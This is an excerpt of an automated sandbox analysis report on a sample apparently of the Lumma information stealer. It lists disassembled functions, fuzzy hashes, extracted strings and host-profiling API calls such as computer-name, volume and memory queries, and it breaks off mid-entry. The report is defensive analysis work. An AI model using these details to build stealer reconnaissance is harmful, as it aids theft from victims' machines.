API String ID: 0-4057445327
Opcode ID: d3ea635584c37d9ee6992b09d2eb38c54fb3c979487357ed22e40e3538265c47
Instruction ID: 44bb24c0c730d522fb732d18ff538c76ea94cd813103399f35dc023296ae4c50
Opcode Fuzzy Hash: d3ea635584c37d9ee6992b09d2eb38c54fb3c979487357ed22e40e3538265c47
Instruction Fuzzy Hash: 80812474E04629CFDB54DFA9E9487ADBBF2FB89300F00906AD409A7244DBB45986CF45

Function 06624C88 Relevance: 1.4, Strings: 1, Instructions: 128COMMON

Download Yara Rule

Strings

dq, xrefs: 06624ADA

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: dq
API String ID: 0-4057445327
Opcode ID: 197d0d9fb27b138a3ad337c29d985bf2d1248596969d9df26c33c2dd8f51576e
Instruction ID: 247aa9c97ca1d740be6a0fd9669751241d32cd7da8adc352a6a31e3e37da51a4
Opcode Fuzzy Hash: 197d0d9fb27b138a3ad337c29d985bf2d1248596969d9df26c33c2dd8f51576e
Instruction Fuzzy Hash: 26514774E04619CFDB54DFA9E8487ADBBF2FB89300F0090AAD409AB248DB745D86CF41

Function 07363109 Relevance: 1.4, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

_, xrefs: 07365B17

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 1b6831e8ed93df7830b964388f166e955de46395b3815637faa3dd8198e32412
Instruction ID: 53034f2cf029eb1940daea63f6bae36e6bc57185c6227643522de7a16601c255
Opcode Fuzzy Hash: 1b6831e8ed93df7830b964388f166e955de46395b3815637faa3dd8198e32412
Instruction Fuzzy Hash: 1A514EB4E116298FDB60DFADC988A8DB7F1BF48314F2482A9D418EB606D3749A55CF04

Function 07369578 Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

pqI, xrefs: 07369647

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: pqI
API String ID: 0-1078129942
Opcode ID: 04d42cf94d818c6b84527a957716dbff32d81694c9c8ac84e8112052a2e2b5ed
Instruction ID: 08dfd5d5df76ff338b241f984a7ded5e51d12814ea9f4afe8dfb575c07da2d37
Opcode Fuzzy Hash: 04d42cf94d818c6b84527a957716dbff32d81694c9c8ac84e8112052a2e2b5ed
Instruction Fuzzy Hash: 824142F4A1910ADFEB40CF69C4857BEBAF9AB49340F58C469D50AD7B0CD374EA418B90

Function 0736956A Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

pqI, xrefs: 07369647

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: pqI
API String ID: 0-1078129942
Opcode ID: 9ea071494e20e6e6ce6b69a8d431b263f6d638e3d0dd6d37d376af57a1663553
Instruction ID: f4418bbd516d8f72febd002a47e2cb3ae4fbcf42dcb3fd57c33650154d4a9bd5
Opcode Fuzzy Hash: 9ea071494e20e6e6ce6b69a8d431b263f6d638e3d0dd6d37d376af57a1663553
Instruction Fuzzy Hash: 554140F4E1914ADFEB40CF69C4853BEBBF5AB49240F58C469950AD7B08D334EA418B90

Function 07360040 Relevance: 1.3, Strings: 1, Instructions: 99COMMON

Download Yara Rule

Strings

;, xrefs: 073655CD

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: ;
API String ID: 0-1661535913
Opcode ID: ea6296956383284658f2d1ebb7e188381edea495d63eae4b2b0eae1bff7db06e
Instruction ID: 6889b3d81582684ad45cc294e82acc383e98e87372d4f50e34d78176ac074875
Opcode Fuzzy Hash: ea6296956383284658f2d1ebb7e188381edea495d63eae4b2b0eae1bff7db06e
Instruction Fuzzy Hash: 634140B1E05A588BEB1CCF6B8D4469EFAF7AFC9301F54C1B9840CAB258EB7009458F11

Function 07368040 Relevance: 1.3, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

(, xrefs: 07368107

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 29fd52e4c31d92eac340206382ba9323dc324081aa88a3d0c69625e3e9b12e44
Instruction ID: 187fc0c60d15a2c16c3e9c88100f475d6884ce4154c5c34c799ce060d091f3d2
Opcode Fuzzy Hash: 29fd52e4c31d92eac340206382ba9323dc324081aa88a3d0c69625e3e9b12e44
Instruction Fuzzy Hash: CA21BAB1D156588BEB18CF6BDC152DEFBF7AFC9301F14C0AAC418AA258DA7409868F41

Function 072A8990 Relevance: 1.3, Strings: 1, Instructions: 69COMMON

Download Yara Rule

Strings

o, xrefs: 072A8A6F

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: o
API String ID: 0-252678980
Opcode ID: 6c853cf3d678f05af6aec9b485b0fed11df8ede35f21f3f6098adb85a64b3282
Instruction ID: d1e6d37d96185ef4c5c48c90313aef9f67a5e7a9ae7a03aad5b3998da9038b4a
Opcode Fuzzy Hash: 6c853cf3d678f05af6aec9b485b0fed11df8ede35f21f3f6098adb85a64b3282
Instruction Fuzzy Hash: 763182B1E156189BEB1DCF6B8D01299FAF7AFC9700F04C1FA941CA6255DB740B858F11

Function 073671A0 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

', xrefs: 0736738C

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: d2cde6ecd5f113fae8a2f0d5b17a471bcaa8c22f991041e98b3fbcc0a640fe0c
Instruction ID: 7439f24877b02dde98e8e1451507d1bcae2359d3ce5926c73714532953f60312
Opcode Fuzzy Hash: d2cde6ecd5f113fae8a2f0d5b17a471bcaa8c22f991041e98b3fbcc0a640fe0c
Instruction Fuzzy Hash: C02130F1D146198BEB18CF67D9083EEBAF7AF89204F54C16AC41CB6258DB340A458F54

Function 073671B0 Relevance: 1.3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

Strings

', xrefs: 0736738C

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: '
API String ID: 0-1997036262
Opcode ID: 6b14e047e8ff3e3179784e47e2db6f8b066761f32917e157c507fa209fcde9e6
Instruction ID: 6c6af2f95780a97ee3677cbdb2006d43c59eddc2daaa17f93ca591adb7a128b2
Opcode Fuzzy Hash: 6b14e047e8ff3e3179784e47e2db6f8b066761f32917e157c507fa209fcde9e6
Instruction Fuzzy Hash: FB214AF1D1521C8BEB18CFAB99082EEBAFBAFC9204F40C169C41CB6258DB300A058F50

Function 072AED10 Relevance: .4, Instructions: 431COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96a463d9bc796efcbf51851e8c0bc17fff7090e8eae07d033faec84c9c6fcdb1
Instruction ID: 3ee063bc7daa55df4ccdbf3b2c248b5e82091da6aa3c3a60adc49db80dafc6b0
Opcode Fuzzy Hash: 96a463d9bc796efcbf51851e8c0bc17fff7090e8eae07d033faec84c9c6fcdb1
Instruction Fuzzy Hash: 2912C2B1E106199BDB14CFAAC98069DFBF2FF88304F24C169D458EB219D734A946CF54

Function 072A3D88 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 541d165d529f09d1f5f06c21c22a40a69f5005cae60a891f5c9df7b09b4d4ef7
Instruction ID: d1e752d74b1a9a5e0911a3390c68792fbf8935c68b11001bd71125a2feaa1320
Opcode Fuzzy Hash: 541d165d529f09d1f5f06c21c22a40a69f5005cae60a891f5c9df7b09b4d4ef7
Instruction Fuzzy Hash: 5881DDB1D25609DFDB04DFA9C4493EDBBF1FB89304F20806AD40AA7241D7B94949CF55

Function 072A3D77 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160f54d603c6560491df562491be2d6a270a5d56a278b7a44618e7d4e0753a69
Instruction ID: 9b8b7c3b429db2da554b0b85b670f240ccc1f35aba3d79ff6b17a2a5274fca68
Opcode Fuzzy Hash: 160f54d603c6560491df562491be2d6a270a5d56a278b7a44618e7d4e0753a69
Instruction Fuzzy Hash: 2181ECB5E25609DFDB04CFA9C4493EDBBF1FB89304F2080AAD40AA7241D7B94949CF54

Function 0736C900 Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f7dffeeb32e13198f6576d2369c3a05c562ffc460f37430f1b408c4d3432e6c
Instruction ID: 432ae61483c270f3482170a76eb062b0b6995109f837e290f15e8f155a2c3dfd
Opcode Fuzzy Hash: 0f7dffeeb32e13198f6576d2369c3a05c562ffc460f37430f1b408c4d3432e6c
Instruction Fuzzy Hash: 32A1B4B4E00219CFDB08CF99D884ADDBBF2FB88314F149569D409AB359E774A845CFA4

Function 066250A1 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 030f06db0bd166383e32b7fbed39a0a134bb24b9470846238f7bb9cf74916c5a
Instruction ID: ec50ce9a6885e8ec5c5a85faebc109d30ece6410244c8b99f2b1f3d668dfd39c
Opcode Fuzzy Hash: 030f06db0bd166383e32b7fbed39a0a134bb24b9470846238f7bb9cf74916c5a
Instruction Fuzzy Hash: 5F513A74E05629DFDB60CFA9E8487EDBBB6FB49314F10902AD406A7280D7745986CF84

Function 066250B0 Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1576115281.0000000006620000.00000040.00000800.00020000.00000000.sdmp, Offset: 06620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6620000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ea1cd167347446902f85f099bac8602f6d8716c949872e4aa96270ccb038cc5
Instruction ID: e10bfa53ecdc7beb293bb53a08446ea9f39a22bacb3dd74a62df72837e75e9a6
Opcode Fuzzy Hash: 0ea1cd167347446902f85f099bac8602f6d8716c949872e4aa96270ccb038cc5
Instruction Fuzzy Hash: 98412874E15629CFDB64CFA9E8487EDBBB2FB49304F10902AD406A7290D7745886CF84

Function 07366F50 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 547f9895aecb87552607be2cdca681fad4b110b6e410c32a8ccfbb202dadff3b
Instruction ID: 6446289d2f95fd615cd962079230ba35df1f94813b086eebbb1e17037876ac7d
Opcode Fuzzy Hash: 547f9895aecb87552607be2cdca681fad4b110b6e410c32a8ccfbb202dadff3b
Instruction Fuzzy Hash: FE511AB0E15209CFEB04CF99D489AAEBBF6FF49300F108569E409AB354D774A981CB91

Function 072AED02 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578284522.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_72a0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef645909736fc04d065b451675cec1c015de3690645a4b8dfff4fb4eb216abc8
Instruction ID: cdb981d60f5e3f21800963c76e7e9c39b1a6a82484cafc5c1e5e4490d34cb2e0
Opcode Fuzzy Hash: ef645909736fc04d065b451675cec1c015de3690645a4b8dfff4fb4eb216abc8
Instruction Fuzzy Hash: 8D4167B5E006199BDB18CFABD94069EFBF3AFC8310F18C07AD918AB214DB3459468F54

Function 07366F42 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2624df3e935438b4e44220afd785611d1832891015bdbe894efe6766f95a39e5
Instruction ID: b669ff48842d778f9b4fdf92ac0ddfd6c85d0c82d32a8941a1e428fac69a6737
Opcode Fuzzy Hash: 2624df3e935438b4e44220afd785611d1832891015bdbe894efe6766f95a39e5
Instruction Fuzzy Hash: 195119B0E15209CFEB04CF99D489BAEBBF6FF48300F148569E409AB354D774A981CB90

Function 07360006 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1578621669.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7360000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036e0a295ace33cb4e67709b28eaa7e12b31c32e2e806a2d78443e9f2730d5ad
Instruction ID: 5c9ed5fdc5f661dbec145144ecdb6d782ea6c8c8548ac2fdde8ac2833207759f
Opcode Fuzzy Hash: 036e0a295ace33cb4e67709b28eaa7e12b31c32e2e806a2d78443e9f2730d5ad
Instruction Fuzzy Hash: E4418DB1D05A588FE71DCF6B9D1529ABFF3AFC9201F18C1B6C44CAA265EA3409468F11

Function 02DBB6A8 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551993373.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7e059de764132b0d95705c2e2ddfc1a275936a37c3bcc5573a6d10abaa1baa0
Instruction ID: 8facb9a846e90ac67e8cbef7601617267e6b6474076270f6a0d2908dbd2ab9aa
Opcode Fuzzy Hash: b7e059de764132b0d95705c2e2ddfc1a275936a37c3bcc5573a6d10abaa1baa0
Instruction Fuzzy Hash: 3141A8B0D05618CBEB69CF66C85879EBBF6BF88304F14C1AAD44DA7264DB744A85CF40

Function 02DBB698 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1551993373.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2db0000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f83e33c6d381613fb8f035a20cc9684dcd3b833247bb0bcf217a58c4212129
Instruction ID: d280b0a26a6749783ad368e57ac18505a65d59a33f40c8d65ec012565307e7a4
Opcode Fuzzy Hash: e9f83e33c6d381613fb8f035a20cc9684dcd3b833247bb0bcf217a58c4212129
Instruction Fuzzy Hash: 49319BB1D056588BEB58CF6BC95878EFAF3AFC8304F14C1A9D40CAA254DB750945CF41

Function 07288730 Relevance: 7.7, Strings: 6, Instructions: 156COMMON

Download Yara Rule

Strings

4'q, xrefs: 072887B4
4'q, xrefs: 0728887A
4'q, xrefs: 07288802
pq, xrefs: 07288887
(q, xrefs: 072888FA
4'q, xrefs: 072887E4

Memory Dump Source

Source File: 00000000.00000002.1578231110.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7280000_lumma_phothockey.jbxd

Similarity

API ID:
String ID: (q$4'q$4'q$4'q$4'q$pq
API String ID: 0-2944075406
Opcode ID: 20f75536f3586f79303413176cdfcd81ae8125ff248ea744e7274a3c86a9354e
Instruction ID: 6dac43bd85d6a9d127b637e6a137e4898965f5adf0f34561ad8b281e68f5800e
Opcode Fuzzy Hash: 20f75536f3586f79303413176cdfcd81ae8125ff248ea744e7274a3c86a9354e
Instruction Fuzzy Hash: 1551B170E103498FD754EB69D8507AEBBA2AFC8200F648469C54A9B681DF35A9068BE1

Analysis Process: lumma_phothockey.exePID: 5392, Parent PID: 4056COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	16.6%
Total number of Nodes:	151
Total number of Limit Nodes:	7

Executed Functions

Function 0044A140 Relevance: 13.1, APIs: 3, Strings: 4, Instructions: 862
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 0044A58F
CoSetProxyBlanket.COMBASE(F7A38AF0,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0044A5D4
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AA5A

Strings

%ABC, xrefs: 0044A247
I)+, xrefs: 0044A43E
?sOf, xrefs: 0044A3F2
h^, xrefs: 0044A16F

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: AllocBlanketInformationProxyStringVolume
String ID: h^$%ABC$?sOf$I)+
API String ID: 2230333033-2754038976
Opcode ID: 792df076acd65fffb69a9d12ec650215c579d034134075cd46444211d9139a7a
Instruction ID: 4551551212836db24def210b2ece7cd3b6819f622b9f9ec99183549da8becfc2
Opcode Fuzzy Hash: 792df076acd65fffb69a9d12ec650215c579d034134075cd46444211d9139a7a
Instruction Fuzzy Hash: 5742F072A483509FE324CF24C84176BBBE1EBD5710F19892EE5D49B381D678D846CB87

Function 0043D9A2 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0043DB69

Strings

t, xrefs: 0043D9B2
2*, xrefs: 0043DB81

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 2*$t
API String ID: 3960555810-3896277123
Opcode ID: 99ced1ecab2c2b95322683a0c858585c50cf2c0ff6afd2f27bf38c08b06bba0f
Instruction ID: b7b7096f104c9a31b3b7eaa63a9eb6a9f47a318a71730f038a233ba1d498ccf2
Opcode Fuzzy Hash: 99ced1ecab2c2b95322683a0c858585c50cf2c0ff6afd2f27bf38c08b06bba0f
Instruction Fuzzy Hash: 01B1E671A0C3818BD729CF2994503ABFBE19FEB304F18956ED0D997382D7398506CB56

Function 0041DA68 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 633
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0041DE83

Strings

WTF\, xrefs: 0041DF15
IPED, xrefs: 0041DF20

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: Uninitialize
String ID: IPED$WTF\
API String ID: 3861434553-2385808767
Opcode ID: 041cb9fc63edfc7d65270f50371fe74de80dd27956a9562dfdbf4f37c7dfff02
Instruction ID: 4f02f829ef80b3ac2f1b81160378a15340a803e1d267b16d03b4dec0a797c07a
Opcode Fuzzy Hash: 041cb9fc63edfc7d65270f50371fe74de80dd27956a9562dfdbf4f37c7dfff02
Instruction Fuzzy Hash: 5812E0B150D3D08BD335CF2588A47ABBBE1AFE6304F184A9DD4D94B352D7380846CB9A

Function 00427FA6 Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60110ff3520f832e0cebda89f24cf7003aff396c24de271f8958188a7277a29c
Instruction ID: 7ee29e473804b5f378caa1a9061c92d90e0e8f5eb4779df79bc230e0e0692f01
Opcode Fuzzy Hash: 60110ff3520f832e0cebda89f24cf7003aff396c24de271f8958188a7277a29c
Instruction Fuzzy Hash: E741F6B160C2529FC724CF28D49176FB7E1AF94304F558A2EE4D987342EB39D845CB86

Function 0044ED60 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00451DA0,005C003F,00000018,?,?,00000018,?,?,?), ref: 0044ED8E

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

Function 0043ECB1 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043ED9B

Strings

4|], xrefs: 0043ED16
12!8, xrefs: 0043ED0B
QixR, xrefs: 0043EDAB

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: ComputerName
String ID: 12!8$4|]$QixR
API String ID: 3545744682-1123279628
Opcode ID: 4c9f798392ec429d76e0c8dd24eaab9ac72b969f74cf059e8cc2d55c4d8186dc
Instruction ID: 4a1b39db04e6f7be27434d89c6172b60a8b1cf920fd7182b4eef401a64a2a2ea
Opcode Fuzzy Hash: 4c9f798392ec429d76e0c8dd24eaab9ac72b969f74cf059e8cc2d55c4d8186dc
Instruction Fuzzy Hash: 94218B300083C18FD7259F3598647EB7FE0AB9B301FA8086ED4CAC3292CA398409DB56

Function 0043ECAD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043ED9B

Strings

4|], xrefs: 0043ED16
12!8, xrefs: 0043ED0B
QixR, xrefs: 0043EDAB

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: ComputerName
String ID: 12!8$4|]$QixR
API String ID: 3545744682-1123279628
Opcode ID: a71ada2ade260975e93f0f92f8a14cb5bfa8ba79bac7cf22e8e3485d137fdfb2
Instruction ID: f1595dbea2ecfeec7fddc6763f234932387179d1ac12098ddd85a102a8361e0a
Opcode Fuzzy Hash: a71ada2ade260975e93f0f92f8a14cb5bfa8ba79bac7cf22e8e3485d137fdfb2
Instruction Fuzzy Hash: DA11BF700083818FD725DF35D8647EB7BE1AB8A311F68082ED0CAC3292CA398805DB56

Function 0043EC39 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0043ED9B

Strings

4|], xrefs: 0043ED16
12!8, xrefs: 0043ED0B
QixR, xrefs: 0043EDAB

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: ComputerName
String ID: 12!8$4|]$QixR
API String ID: 3545744682-1123279628
Opcode ID: 5e016a97d19cb222abf8a5237585cbbe5bab3afb341d211062665889740ce37a
Instruction ID: 6759acaac840cc78748eae32ff4b4f2b3183ee3b990cd15180c63f845e7c178a
Opcode Fuzzy Hash: 5e016a97d19cb222abf8a5237585cbbe5bab3afb341d211062665889740ce37a
Instruction Fuzzy Hash: A811A3701093818FD765DF35D8607EB7BE5AB8A311F58082ED4CAC7292DA398405CB56

Function 0043EDC1 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0043EE7B

Memory Dump Source

Source File: 00000004.00000002.3760027862.0000000000411000.00000020.00000400.00020000.00000000.sdmp, Offset: 00410000, based on PE: true

Associated: 00000004.00000002.3760003869.0000000000410000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_410000_lumma_phothockey.jbxd

Similarity

API ID: ComputerName
String ID:
API String ID: 3545744682-0
Opcode ID: 6cd6876f870dfd983d1f9c9e584449ad629e66074151198d9c937f50f6c20eaf
Instruction ID: 7bf74138b7f9ae9c09663b05561fc3eea2695ba77407ee1b44183a17575c613d
Opcode Fuzzy Hash: 6cd6876f870dfd983d1f9c9e584449ad629e66074151198d9c937f50f6c20eaf
Instruction Fuzzy Hash: 7111602410D3C18ADB758B3694647FBBBE4AB5B305F18599ED1D9C72D2CA3480058B16

Function 0043EDBF Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

